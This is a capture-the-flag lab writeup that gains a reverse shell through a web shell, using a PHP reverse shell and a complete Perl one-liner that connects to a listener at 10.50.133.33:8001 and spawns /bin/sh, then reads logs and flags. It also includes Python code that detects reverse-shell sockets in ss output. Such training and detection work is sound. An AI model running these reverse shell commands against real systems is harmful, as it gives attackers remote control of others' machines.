# First Contact

We have identified an attack surface that lets us execute PHP and shell commands. From the web shell we can launch a reverse shell to get a shell back from the machine.

### Uploading a PHP Reverse Shell

For the PHP reverse shell, we’ll be using Pentest Monkey’s reverse shell, found [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) or in Kali under `/usr/share/webshells/php/php-reverse-shell.php`.

1. Modify the reverse shell to use your **tun0 IP address** and **port**.
2. Paste the PHP code into the web shell. Note: the first line **\<?php** and the last line **?>** need to be removed.
3. Start a netcat listener on port 53.
4. Execute the reverse shell.

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FyglQw6Cs06Wn8JIoTJWY%2Fphp_reverse01.png?alt=media&#x26;token=05ba2e83-d383-4b29-9bc9-c680305d46ff" alt=""></div>

Problem with the netcat listener on port 53:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FSdLpSla9YjRdEU3XeO5m%2Fphp_reverse02.png?alt=media&#x26;token=7bd49698-4c3d-4a3f-8261-a89d39547312" alt=""></div>

Kill the systemd-resolved process and start the netcat listener again.

Execute the reverse shell:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FqjqKn2L17nX5IEGbrybH%2Fphp_reverse04.png?alt=media&#x26;token=079dbc11-b8c3-42dc-bab1-bd01cb38fca4" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FO6Oj9n3L73bAdZAvcvPT%2Fphp_reverse03.png?alt=media&#x26;token=4f1e7199-3302-48bf-b2e3-99af16b10e54" alt=""></div>

To answer the questions and find the flag, I need to focus on the logs.

Searching for logs: `cd /var/log`

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FM8gIVK7m0NfwOi1XCirc%2Fphp_reverse05.png?alt=media&#x26;token=57b90539-4ccd-49ed-9f8b-159100802fb5" alt="content of /var/log"></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FtDtNoqshPBqs6z0UGCWX%2Fphp_reverse06.png?alt=media&#x26;token=b2fb319a-5285-48a1-90b5-2e1b84ff12f0" alt="content of login.log and flag.txt"></div>

Getting the root flag

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FArMlK7biPuDRpGZ0odnl%2Fphp_reverse07.png?alt=media&#x26;token=acdb78db-040d-4532-afe1-ac4b568949c4" alt="content of rot.txt"></div>

### Additional way to get a reverse shell

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md>" %}
Reverse shell cheatsheet
{% endembed %}

```
perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

![Execute perl reverse shell](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F72VZYSPluXcSD5e1ziik%2Fperl_reverseshell.png?alt=media\&token=b1357ec8-2687-4db4-b68f-0aa0b03ae539)
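
Seen from the host, the Perl one-liner above leaves a shell whose stdin, stdout and stderr are a TCP socket, and a PHP shell started through a web shell makes the web server's worker process dial out. The following Python example, added here and not part of the original writeup, flags both patterns in `ss -Htnp` output; the sample lines, process names and served ports are constructed assumptions.

```python
import re

# Constructed `ss -Htnp` sample (root needed for process info); ports 53/8001 mirror this page.
SAMPLE_SS = """\
ESTAB 0 0 10.10.20.5:80 10.50.133.33:51544 users:(("apache2",pid=812,fd=11))
ESTAB 0 0 10.10.20.5:41822 10.50.133.33:53 users:(("apache2",pid=815,fd=12))
ESTAB 0 0 10.10.20.5:36470 10.50.133.33:8001 users:(("sh",pid=2101,fd=0),("sh",pid=2101,fd=1),("sh",pid=2101,fd=2),("sh",pid=2101,fd=3))
ESTAB 0 0 10.10.20.5:22 10.50.133.33:40022 users:(("sshd",pid=990,fd=4))
ESTAB 0 0 127.0.0.1:3306 127.0.0.1:50112 users:(("mysqld",pid=700,fd=30))
"""

SHELLS = {"sh", "bash", "dash"}                      # assumption: shells present on the host
WEB_PREFIXES = ("apache2", "httpd", "nginx", "php")  # assumption: web stack process names
SERVED_PORTS = {80, 443}                             # assumption: ports the web server listens on
USER_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')


def split_addr(addr):  # 'host:port' or '[v6]:port' -> (host, int(port))
    host, _, port = addr.rpartition(":")
    return host, int(port)


def suspicious_sockets(ss_output):
    """Return (pid, process, peer, reason) for sockets that look like a reverse shell."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6 or fields[0] != "ESTAB":
            continue  # no process column (not root) or not an established connection
        _, local_port = split_addr(fields[3])
        peer_host, peer_port = split_addr(fields[4])
        if peer_host.startswith("127.") or peer_host == "[::1]":
            continue  # loopback traffic is out of scope here
        peer = f"{peer_host}:{peer_port}"
        for name, pid, fd in USER_RE.findall(fields[5]):
            if name in SHELLS and int(fd) <= 2:
                # stdin/stdout/stderr of a shell duplicated onto a TCP socket
                findings.append((int(pid), name, peer, "shell stdio bound to TCP socket"))
                break
            if name.startswith(WEB_PREFIXES) and local_port not in SERVED_PORTS:
                # a worker holding a socket on an ephemeral local port dialed out itself
                reason = "web worker dialed out" + (" to TCP/53" if peer_port == 53 else "")
                findings.append((int(pid), name, peer, reason))
                break
    return findings


if __name__ == "__main__":
    print(*suspicious_sockets(SAMPLE_SS), sep="\n")
```

Legitimate outbound connections from the web stack (database, upstream APIs) will also match the second rule, so it needs an allowlist of expected peers before being used for alerting.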

### Questions

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FVkLslY61LmTxpYc3nJ1C%2Fquestions_task10.png?alt=media\&token=6f09b468-8946-4cb7-9074-c03afbecf18b)
